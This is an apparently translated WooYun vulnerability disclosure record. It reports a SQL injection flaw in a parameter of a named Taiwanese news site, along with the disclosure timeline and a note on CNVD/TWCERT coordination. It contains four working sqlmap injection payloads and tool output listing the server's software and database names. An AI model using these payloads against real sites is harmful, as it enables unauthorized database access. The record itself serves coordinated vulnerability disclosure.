WooYun (WooYun.org) historical vulnerability search: http://wy.zone.ci/
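2014-03-10: Details reported to the vendor; awaiting vendor handling
2014-03-15: Vendor confirmed; details disclosed to the vendor only
2014-03-25: Details disclosed to core white hats and experts in related fields
2014-04-04: Details disclosed to regular white hats
2014-04-14: Details disclosed to intern white hats
2014-04-24: Details disclosed to the public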
RT
1. Injection point (not China Post): http://www.chinapost.com.tw/guidepost/topics/default.asp?id=3577&sub=10
Place: GET
Parameter: sub
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3577&sub=10 AND 9496=9496

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=3577&sub=10 AND 3261=CONVERT(INT,(SELECT CHAR(113)+CHAR(97)+CHAR(116)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (3261=3261) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(108)+CHAR(116)+CHAR(113)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 16 columns
    Payload: id=3577&sub=-9613 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(97)+CHAR(116)+CHAR(98)+CHAR(113)+CHAR(109)+CHAR(106)+CHAR(97)+CHAR(121)+CHAR(83)+CHAR(70)+CHAR(107)+CHAR(113)+CHAR(122)+CHAR(88)+CHAR(113)+CHAR(119)+CHAR(108)+CHAR(116)+CHAR(113),NULL,NULL,NULL,NULL--

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=3577&sub=(SELECT CHAR(113)+CHAR(97)+CHAR(116)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (9631=9631) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(108)+CHAR(116)+CHAR(113))
---
[13:55:45] [INFO] testing Microsoft SQL Server
[13:55:46] [INFO] confirming Microsoft SQL Server
[13:55:47] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
available databases [10]:
[*] abm7
[*] absolutebm
[*] cpnews
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] sp
[*] tempdb
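Filtering
Severity: High
Vulnerability Rank: 11
Confirmation time: 2014-03-15 20:36
CNVD confirmed and reproduced the situation described, and has handed it to CNCERT to notify TWCERT through its direct contact channel; TWCERT will then coordinate with the local website's administrators to handle it.
None yet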